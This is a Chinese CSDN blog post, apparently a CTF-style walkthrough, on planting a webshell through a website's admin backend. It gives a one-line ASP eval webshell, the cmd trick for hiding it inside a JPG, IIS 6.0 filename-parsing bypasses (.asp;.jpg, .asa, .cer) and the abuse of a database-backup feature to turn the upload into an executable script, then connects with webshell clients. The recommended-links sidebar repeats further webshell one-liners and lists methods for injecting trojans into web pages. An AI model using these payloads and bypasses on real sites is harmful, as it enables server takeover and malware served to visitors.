简单的后台挂马

于 2024-04-06 22:26:18 发布
阅读量303 收藏 4
点赞数 2
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76206334/article/details/137439562
版权

一般来说 给一个网站 都是先找出它的后台登录界面  过登录界面的方法很多  很多人都发过了 像sql注入 弱口令等 所以我们直接快进到网站后台登录界面 尝试挂马

1.找到文件上传的地方 

差不多 网站都会做黑白名单的过滤 所以想要直接访问.asp .php .asa等之类的木马文件基本上行不通   所以我们换思路 拿这题做例子

通过burp发送响应包 我们发现中间件的版本 是iis6.0 我们首先想到解析漏洞

2.尝试利用解析漏洞上传木马文件

先利用cmd做一个简单的木马  copy  copy 1.jpg/b+1.asp/a  2.jpg          php同样适用

<%eval request("a")%>

将后缀名改为 3.asp;.jpg        顺便补充一点

后缀名为 .asa .cer .cdx 的文件都能被当做脚本执行

3.提交之后发现文件名依旧没变   但是我们知道了路径

4.接着我们在翻看网站时发现一个数据库备份的地方 我们就可以利用了

5.接着发现了数据库的备份目录

6.我们访问发现 有两个asa后缀名 访问失败

7.尝试去掉一个后缀名  

8.出现乱码就说明 木马被当做脚本执行了  然后我们连接 蚁剑 (菜刀也可以)

成功访问后台   做题的时候 经常发现 数据库备份和文件上传配合 获取webshell

林子汐•
关注
html网页挂马,浏览器安全之网页挂马实战 ——合天网安实验室学习笔记
weixin_29310605的博客
06-18 2699
实验连接网页挂马指的是把一个木马程序上传到网站里面,使得木马在打开网页时运行。网页挂马方式包括框架挂马、js文件挂马、body挂马、css挂马、图片假装等。经过实验了解网页挂马相关知识,学会使用框架挂马并进行相关利用。css实验简介实验所属系列: Web安全web实验对象: 本科/专科信息安全专业数据库相关课程及专业: 计算机基础、HTML、Linuxapache实验类别: 实践实验类vim预备知...
挂马方法和技巧详解
北冥
03-28 1791
(1) HTML挂马法。   常规的HTML挂马方法一般是在网页中插入一条iframe语句,像。查看站点是否被挂,一般是查找一下关键词iframe。(2) 再隐藏一点的就是js挂马了。  像再原来的网页中写入 ,horse里的js写法一般为 document.write(’http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.b
如何给网站注入木马程序
m0_75056154的博客
03-03 1051
如何给网站注入一次性木马
CSB文件上传漏洞 -->Day4(图片挂马
huohaowen的博客
12-22 1420
图片挂马,css二次渲染,文件包含
1-1 【理论】01-文件上传/下载漏洞的业务场
山兔的博客
02-27 1300
今天,我们这篇文章来讲文件上传/下载漏洞的原理以及危害,这篇文章从四个方面来讲, 1 文件上传漏洞产生的原因 2 文件上传合法性的检测方法 3文件上传漏洞20种绕过姿势 4 文件下载漏洞 文件上传漏洞介绍 ​ 文件上传在我们的平时生活和工作中,是很常见的,比如,我们要上传个图像,上传个资料,上传一些其它文件和内容 ​ 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限,向服务器上上传可执行的动态脚本文件 控制不足或者处理缺陷这点跟我们
网页病毒挂马原理解析
bing_JavaScript的博客
05-05 5001
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自
传统webshell上传方法小结
热门推荐
Breeze的博客
04-22 3万+
上传木马拿webshell的几种方法汇总(不全) 普通权限下拿webshell 使用sql注入拿webshell 头像上传木马 文件上传漏洞 远程命令执行 xss和sql注入联合利用 网站写权限漏洞 通用漏洞 拿到后台管理权限下上传木马 直接上传 修改上传类型 数据库备份上传木马 突破JavaScript限制上传类型 上传其他脚本类型 %00截断 服务器解析漏洞 利用编辑器 网站配置 编辑...
bbsxp2007 利用后台挂马第二部分
02-17
bbsxp2007 以补上了上传ASA漏洞,不过我们可用数据库备份和恢复功能挂马
bbsxp2007 利用后台挂马第一部分
02-17
bbsxp2007 以补上了上传ASA漏洞,不过我们可用数据库备份和恢复功能挂马
预防网页挂马的方法总结
09-01
- **隐藏管理页面**:避免在前端页面提供后台登录链接。 - **定期备份**:备份重要文件,但不要存放在易受攻击的位置。 - **复杂密码**:管理员账户应设置复杂密码。 - **IIS配置**:禁用目录写入和执行权限,...
wordpress网站被挂马以及防御方法
09-28
第三,为了防止攻击者通过URL直接访问后台,可以采用隐藏后台登录地址的方式,例如通过修改网站配置或利用某些插件,使攻击者无法通过简单的“/wp-admin”访问后台。 第四,使用robots.txt文件或相关插件屏蔽后台...
文件上传 webshell 各类型 一句话木马 图片马 制作 教程
weixin_44286136的博客
06-05 1万+
webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数 大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到 图片马:
文件上传篇——各类木马的制作
bylfsj的博客
09-23 1684
声明:只做技术研究的分享,如果恶意使用造成任何法律责任概不负责!一、asp一句话木马<%eval request("CrAcK8")%><%executerequest("CrAcK8")%><%execute(request("CrAcK8"))%><%execut...
网页挂马类型
安静
06-01 1304
一:框架挂马 二:js文件挂马首先将以下代码document.write("");保存为xxx.js,则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀四:body挂马五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + /r/n;六:css中挂马body { background-image: ur
考研复习-英语二真题考试题集-带答案
09-14
英语二考研真题复习资料,带答案版
2024中美独角兽公司发展分析报告.pdf
09-14
全球各大洲独角兽企业分布、中美独角兽企业对比(数量、估值、新增及退榜情况、行业分布、所在城市)、
C++ 中的异步编程模型是什么
09-14
在C++中,异步编程模型是处理并发任务、提高程序性能和响应性的关键技术。以下是C++中实现异步编程的几种主要方式: 每种异步编程模型都有其适用场景和优缺点。选择合适的模型可以提高代码的可读性、可维护性和性能。随着C++标准的不断发展,异步编程模型也在不断进化,为开发者提供了更多的工具和选择。 在实际开发中,应根据具体需求选择合适的异步编程模型。例如,对于简单的异步任务,回调函数可能是最直接的选择;而对于需要结构化错误处理和结果获取的复杂异步任务,std::async和std::future可能更合适;在需要高效资源管理的场景下,线程池是一个不错的选择;而对于需要编写大量异步代码的现代应用程序,协程提供了一种更简洁、更直观的解决方案。 总之,C++中的异步编程模型是多核和高并发环境下提高程序性能的重要工具。通过合理使用这些模型,开发者可以构建出更高效、更可靠的软件系统
正则表达式Regex是一种文本模式.docx
最新发布
09-14
正则表达式(Regular Expression,简称Regex或Regexp)是一种文本模式,包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为"元字符")。正则表达式使用单个字符串来描述、匹配一系列符合某个句法规则的字符串。正则表达式是强大的文本处理工具,广泛用于搜索、编辑或操作文本和数据。 基本组成 普通字符:大多数字符,包括所有大写和小写字母、所有数字、所有标点符号和一些其他符号,都是普通字符。正则表达式中的普通字符表示它们自身。例如,正则表达式test会匹配字符串"test"。 特殊字符(元字符):一些字符在正则表达式中具有特殊的意义,如^、$、.、*、+、?、{、}、[、]、|、\等。这些特殊字符用于表示在搜索文本时要匹配的一个或多个字符。例如,.匹配除换行符之外的任何单个字符。 字符类:字符类允许你指定一组字符中的任何一个字符。例如,[abc]匹配"a"、"b"或"c"中的任意一个字符。你也可以使用范围,如[a-z]匹配任何小写字母。 预定义字符类:正则表达式提供了一些预定义字符类,用于匹配常见的字符集合。例如,\d匹配任何数字(等价于[0-9]),\s匹配任
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值